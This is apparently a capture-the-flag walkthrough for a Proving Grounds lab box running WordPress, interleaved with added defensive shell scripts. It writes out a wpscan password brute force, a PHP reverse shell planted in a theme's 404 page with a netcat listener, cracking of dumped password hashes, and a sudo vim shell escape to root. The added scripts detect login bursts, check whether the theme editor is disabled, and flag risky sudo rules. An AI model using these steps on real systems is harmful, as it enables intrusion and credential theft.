This walkthrough is for the box ColdBoxEasy on Proving Grounds at: https://portal.offsec.com/labs/play
Basically, start your VPN connection, start the box on Proving Grounds and start targeting it.

Synopsis:
– Nmap: find the open ports and the WordPress install
– wpscan to crack c0ldd’s password
– Log in, create a 404.php in theme editor for 404, then call it with something like http://target/whatever
– It dials back into my waiting netcat listener: nc -nvlp 4444
– Cat /home/c0ldd/local.txt for flag 1
– Find SUID bits and vim -c ':!/bin/sh' gave me root
– There's a base64 string in /home/c0ldd/users.txt but it's useless. It's amusing, but decode it with cat /home/c0ldd/users.txt | base64 -d to see it
– Fun box

Host: Linux ColddBox-Easy 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

IP Address: 192.168.205.239

Open Ports:
80
443
445
3306

Usernames: c0ldd, philip, hugo and probably others
Spotted Vulns: wpscan vs http://target/wp-admin login
Flag Value: [hidden – go find it for yourself]
Proof Value: Found in /root/ as flag.txt

Notes:

In the target/hidden/index.html is this:
C0ldd, you changed Hugo’s password, when you can send it to him so he can continue uploading his articles. Philip
Three usernames: c0ldd, Hugo and Philip.

wpscan --url http://192.168.205.239 -U c0ldd -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: c0ldd, Password: [Hidden. Go get it!]

Log in to WordPress with those creds (you're admin) and go to Appearance > Editor.
Edit the 404.php file with a PHP reverse shell, then call it with http://target/?m=202011, which doesn't exist. That elicits the 404 page, which then dials home to my awaiting nc listener.
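The wpscan password attack that got us in leaves a very recognisable trace on the server side: a burst of POST requests to /wp-login.php from one source. This is an added example, not part of the original walkthrough, showing how a defender would pull those bursts out of an access log. The log lines and IP addresses are constructed; the function reads combined-format log lines on stdin and reports every source IP that hits the login endpoint at least a threshold number of times.

```shell
#!/bin/sh
# Added example (not from the walkthrough): find source IPs that hammer
# /wp-login.php, the footprint a wordlist attack like wpscan -U/-P leaves in
# the web server's access log. All log lines and addresses are constructed.

# Constructed sample in Apache/nginx "combined" format (one attacker, one
# ordinary visitor). Field 6 is the quoted method, field 7 the request path.
SAMPLE_LOG='10.0.0.5 - - [24/Sep/2020:15:06:57 +0000] "POST /wp-login.php HTTP/1.1" 200 1234 "-" "WPScan v3.8"
10.0.0.5 - - [24/Sep/2020:15:06:58 +0000] "POST /wp-login.php HTTP/1.1" 200 1234 "-" "WPScan v3.8"
10.0.0.5 - - [24/Sep/2020:15:06:58 +0000] "POST /wp-login.php HTTP/1.1" 200 1234 "-" "WPScan v3.8"
10.0.0.5 - - [24/Sep/2020:15:06:59 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
10.0.0.9 - - [24/Sep/2020:15:07:10 +0000] "GET /hidden/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Sep/2020:15:07:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# wp_login_bursts THRESHOLD   (log lines on stdin)
# Prints "count ip", highest count first, for every source IP with at least
# THRESHOLD POST requests to /wp-login.php. Response codes are ignored on
# purpose: wp-login.php answers 200 to a failed login and 302 to a successful
# one, so the volume, not the status, is the signal.
wp_login_bursts() {
    threshold="$1"
    awk -v t="$threshold" '
        $6 == "\"POST" && $7 ~ /^\/wp-login\.php/ { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= t) print hits[ip], ip }
    ' | sort -rn
}

# Stand-alone run: report anyone with 3 or more login attempts.
printf '%s\n' "$SAMPLE_LOG" | wp_login_bursts 3
```

On a real host you would feed it the live log (`wp_login_bursts 20 < /var/log/apache2/access.log`) and pick a threshold that fits normal traffic; the same tally is what a fail2ban-style jail or a login rate limit acts on.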

Priv esc:
Inside /var/www/html is wp-config.php with the username and password for the MySQL database.
Use these commands in mysql: show databases; show tables; select * from wp_users;

| 1 | c0ldd | $P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1 | c0ldd | c0ldd@localhost.com | | 2020-09-24 15:06:57 |0 | the cold in person |
| 2 | hugo | $P$B2512D1ABvEkkcFZ5lLilbqYFT1plC/ | hugo | hugo@localhost.com | | 2020-09-24 15:48:13 |0 | hugo |
| 4 | philip | $P$BXZ9bXCbA1JQuaCqOuuIiY4vyzjK/Y. | philip | philip@localhost.com | | 2020-10-19 17:38:25 |0 | philip |

Also, in the wp-config.php file under /var/www/html you see some passwords (which I hid):
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define('DB_PASSWORD', '[hidden]');

/** MySQL hostname */
define('DB_HOST', 'localhost');
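The whole foothold above depends on the WordPress dashboard letting an admin edit theme files in the browser. WordPress turns that editor off when wp-config.php defines the DISALLOW_FILE_EDIT constant as true, which is the standard hardening for it. The following check is an added example, not code from the walkthrough or from WordPress: it takes a wp-config.php on stdin and reports whether the editor is disabled. The two config fragments are constructed (the password is a placeholder), one mirroring the box's weak default and one hardened.

```shell
#!/bin/sh
# Added example (not from the walkthrough): does this wp-config.php disable
# the in-dashboard theme/plugin editor? WordPress honours
#   define('DISALLOW_FILE_EDIT', true);
# for that. Both config fragments below are constructed samples.

# Weak: the box's config, which never mentions DISALLOW_FILE_EDIT, so the
# editor under Appearance is available to any admin account.
WEAK_CONFIG="<?php
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'PLACEHOLDER');
define('DB_HOST', 'localhost');"

# Hardened: same settings plus the editor switched off.
HARDENED_CONFIG="<?php
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'PLACEHOLDER');
define('DB_HOST', 'localhost');
/* Removes Appearance > Editor and Plugins > Editor from the dashboard */
define('DISALLOW_FILE_EDIT', true);"

# file_edit_disabled   (config text on stdin)
# Exit 0 when the config contains define('DISALLOW_FILE_EDIT', true)
# with either quote style and any whitespace, exit 1 otherwise.
file_edit_disabled() {
    grep -Eq "define\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)"
}

# check_config NAME   (config text on stdin)
# Prints a one-line verdict for NAME.
check_config() {
    if file_edit_disabled; then
        printf '%s: ok, dashboard file editor disabled\n' "$1"
    else
        printf '%s: theme editor enabled, add define('"'"'DISALLOW_FILE_EDIT'"'"', true)\n' "$1"
    fi
}

# Stand-alone run over both samples.
printf '%s\n' "$WEAK_CONFIG" | check_config weak
printf '%s\n' "$HARDENED_CONFIG" | check_config hardened
```

Against a live site: `check_config prod < /var/www/html/wp-config.php`. Disabling the editor does not stop an admin from uploading a theme zip, so the credentials and the login endpoint still need the protection described above; it just removes the one-click path from admin to PHP execution.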

Ok, got in with mysql -u colddbox / cybersecurity.
Found colddbox database with wp_users table and:

$P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1
echo '$P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1' > hash.txt
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

There are no local user accounts called hugo or philip, but we can use the c0ldd account: su c0ldd + password.
hash-hugo shows: [Hidden]
hash-philip shows: (Killed hashcat b/c it wasn’t necessary and was taking 100% CPU)
hash-c0ldd is: cybersecurity. su c0ldd and I have access to his files in /home/c0ldd

Found users.txt with base64 string: RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==
Felicidades, primer nivel conseguido! (Congratulations, first level achieved!)
We already got the flag though, so lol

Anyhow, I found somewhere to try this:
sudo vim -c ':!/bin/sh' and it gave me root, so cd /root/ and cat proof.txt

How that happens:
sudo : You’re running the command as root (because hugo had sudo rights — likely to run vim without a password).
vim -c : You’re telling Vim to run a command at startup.
:! : This is a Vim shell escape — it spawns a subshell from inside Vim.
/bin/sh : So you’re saying, “run a shell… as root.”

Which gives you:
id
uid=0(root) gid=0(root) groups=0(root)

Why It Works: sudo rules for vim
This exploit works only if the user is allowed to run vim as root via sudo, like:
sudo -l
User hugo may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/vim
Since Vim can run arbitrary shell commands, and it's running as root, you get a root shell.
Safer Alternative in Real Environments
This is why giving users sudo vim or sudo less is basically giving them root. It's a classic GTFOBins move.
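For the "safer alternative" side, the usual fix is to never grant an editor (or pager, or interpreter) as a sudo command at all: if a user needs to edit one root-owned file, give them sudoedit on that file, which edits a copy as the user and only the final write runs as root, with no shell escape to reach. The script below is an added example, not part of the walkthrough: it audits sudoers-style rules (or the lines sudo -l prints) and flags any rule whose command is a known shell-escape binary. The rule text is constructed, and the list of risky binaries is a small hand-picked subset of the GTFOBins catalogue, not the whole thing.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag sudo rules that hand out a
# root shell through a shell escape. Works on sudoers lines
# ("hugo ALL=(ALL) NOPASSWD: /usr/bin/vim") and on the command lines that
# sudo -l prints ("(ALL) NOPASSWD: /usr/bin/vim"). One command per rule is
# assumed. Rule text and the binary list below are constructed samples.

# The weak rule behind this box, as the walkthrough's sudo -l output shows it.
WEAK_RULES='hugo ALL=(ALL) NOPASSWD: /usr/bin/vim'

# Hardened replacement: sudoedit on one file instead of a whole editor.
# sudoedit copies the file, opens the copy as the unprivileged user, and
# only writes the result back as root, so ":!" in vim stays unprivileged.
HARDENED_RULES='hugo ALL=(ALL) sudoedit /etc/motd'

# Hand-picked subset of binaries that can spawn a shell when run under sudo.
SHELL_ESCAPE_BINS='vim vi nano less more man find awk python perl bash sh'

# risky_sudo_rules   (rules on stdin)
# Prints every rule whose command basename is in SHELL_ESCAPE_BINS.
risky_sudo_rules() {
    while IFS= read -r rule; do
        case "$rule" in ''|'#'*) continue ;; esac      # skip blanks and comments
        cmd=${rule#*=}                                  # drop "user host=" if present
        cmd=$(printf '%s\n' "$cmd" | sed -e 's/^ *([^)]*) *//' \
                                         -e 's/^NOPASSWD: *//' \
                                         -e 's/^PASSWD: *//')   # drop "(runas)" and tags
        set -- $cmd                                     # $1 is now the command path
        bin=${1##*/}
        for bad in $SHELL_ESCAPE_BINS; do
            if [ "$bin" = "$bad" ]; then
                printf '%s\n' "$rule"
                break
            fi
        done
    done
}

# Stand-alone run: the weak rule is reported, the hardened one is silent.
echo "weak:";     printf '%s\n' "$WEAK_RULES"     | risky_sudo_rules
echo "hardened:"; printf '%s\n' "$HARDENED_RULES" | risky_sudo_rules
```

To audit a real host, run it as `sudo -l | risky_sudo_rules` for one account or `cat /etc/sudoers /etc/sudoers.d/* | risky_sudo_rules` for the whole policy (visudo -c first, since a syntax error in sudoers locks everyone out).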
